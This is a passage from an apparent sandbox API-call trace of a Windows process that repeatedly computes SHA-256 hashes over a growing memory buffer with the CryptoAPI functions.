(hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x700, dwFlags=0x0) returned 1 [0179.410] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.410] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d7d0 [0179.410] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d7d0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d7d0, pdwDataLen=0xcdf6c) returned 1 [0179.410] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.410] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.410] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.411] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.411] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x720, dwFlags=0x0) returned 1 [0179.411] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.411] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d830 [0179.411] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d830, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d830, pdwDataLen=0xcdf6c) returned 1 [0179.411] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.411] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.411] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.412] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.412] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x740, dwFlags=0x0) returned 1 [0179.412] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.412] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6da40 [0179.412] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6da40, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6da40, pdwDataLen=0xcdf6c) returned 1 [0179.412] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.412] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.412] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0179.412] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.412] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x760, dwFlags=0x0) returned 1 [0179.413] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.413] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d590 [0179.413] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d590, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d590, pdwDataLen=0xcdf6c) returned 1 [0179.413] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.413] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0179.413] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821fd0) returned 1 [0179.413] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.413] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x780, dwFlags=0x0) returned 1 [0179.413] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.413] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d230 [0179.414] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d230, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d230, pdwDataLen=0xcdf6c) returned 1 [0179.414] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.414] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0179.414] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0179.414] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.414] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0179.414] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.414] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d140 [0179.414] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d140, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d140, pdwDataLen=0xcdf6c) returned 1 [0179.414] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.415] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0179.415] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0179.415] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.415] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0179.415] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.415] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d3b0 [0179.415] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d3b0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d3b0, pdwDataLen=0xcdf6c) returned 1 [0179.415] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.415] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0179.415] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0179.416] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.416] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0179.416] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.416] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d170 [0179.416] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d170, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d170, pdwDataLen=0xcdf6c) returned 1 [0179.416] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.416] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0179.416] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.417] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.417] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x800, dwFlags=0x0) returned 1 [0179.417] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.417] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d4a0 [0179.417] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d4a0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d4a0, pdwDataLen=0xcdf6c) returned 1 [0179.417] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.417] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.417] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0179.418] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.418] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x820, dwFlags=0x0) returned 1 [0179.418] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.418] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d3e0 [0179.418] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d3e0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d3e0, pdwDataLen=0xcdf6c) returned 1 [0179.418] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.418] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0179.418] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.419] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.419] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x840, dwFlags=0x0) returned 1 [0179.419] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.419] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d680 [0179.419] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d680, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d680, pdwDataLen=0xcdf6c) returned 1 [0179.419] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.419] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.419] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0179.420] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.420] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x860, dwFlags=0x0) returned 1 [0179.420] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.420] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d410 [0179.420] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d410, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d410, pdwDataLen=0xcdf6c) returned 1 [0179.420] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.420] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0179.420] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0179.421] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.421] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x880, dwFlags=0x0) returned 1 [0179.421] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.421] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d260 [0179.421] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d260, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d260, pdwDataLen=0xcdf6c) returned 1 [0179.421] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.421] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0179.421] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0179.422] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.422] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0179.422] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.422] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dad0 [0179.422] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6dad0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6dad0, pdwDataLen=0xcdf6c) returned 1 [0179.422] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.422] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0179.422] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822fd0) returned 1 [0179.423] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.423] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0179.423] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.423] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf90 [0179.423] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6cf90, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6cf90, pdwDataLen=0xcdf6c) returned 1 [0179.423] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.423] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0179.423] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.424] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.424] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0179.424] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.424] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d290 [0179.424] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d290, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d290, pdwDataLen=0xcdf6c) returned 1 [0179.424] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.424] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.424] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0179.424] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.424] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x900, dwFlags=0x0) returned 1 [0179.424] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.425] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cfc0 [0179.425] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6cfc0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6cfc0, pdwDataLen=0xcdf6c) returned 1 [0179.425] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.425] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0179.425] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.425] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.425] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x920, dwFlags=0x0) returned 1 [0179.425] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.425] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d6b0 [0179.426] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d6b0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d6b0, pdwDataLen=0xcdf6c) returned 1 [0179.426] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.426] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.426] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0179.426] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.426] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x940, dwFlags=0x0) returned 1 [0179.426] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.426] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6da70 [0179.426] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6da70, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6da70, pdwDataLen=0xcdf6c) returned 1 [0179.426] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.426] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0179.427] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.427] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.427] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x960, dwFlags=0x0) returned 1 [0179.427] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.427] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d2f0 [0179.427] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d2f0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d2f0, pdwDataLen=0xcdf6c) returned 1 [0179.427] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.427] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.427] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.428] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.428] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x980, dwFlags=0x0) returned 1 [0179.428] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.428] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6daa0 [0179.428] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6daa0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6daa0, pdwDataLen=0xcdf6c) returned 1 [0179.428] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.428] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.428] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0179.429] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.429] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0179.429] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.429] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d1a0 [0179.429] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d1a0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d1a0, pdwDataLen=0xcdf6c) returned 1 [0179.429] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.429] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0179.429] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0179.430] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.430] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0179.430] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.430] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d4d0 [0179.430] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d4d0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d4d0, pdwDataLen=0xcdf6c) returned 1 [0179.430] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.430] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0179.430] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0179.431] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.431] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0179.431] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.431] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d2c0 [0179.431] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d2c0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d2c0, pdwDataLen=0xcdf6c) returned 1 [0179.431] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.431] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0179.431] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0179.432] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.432] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0179.432] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.432] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d860 [0179.432] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d860, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d860, pdwDataLen=0xcdf6c) returned 1 [0179.432] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.432] CryptReleaseContext 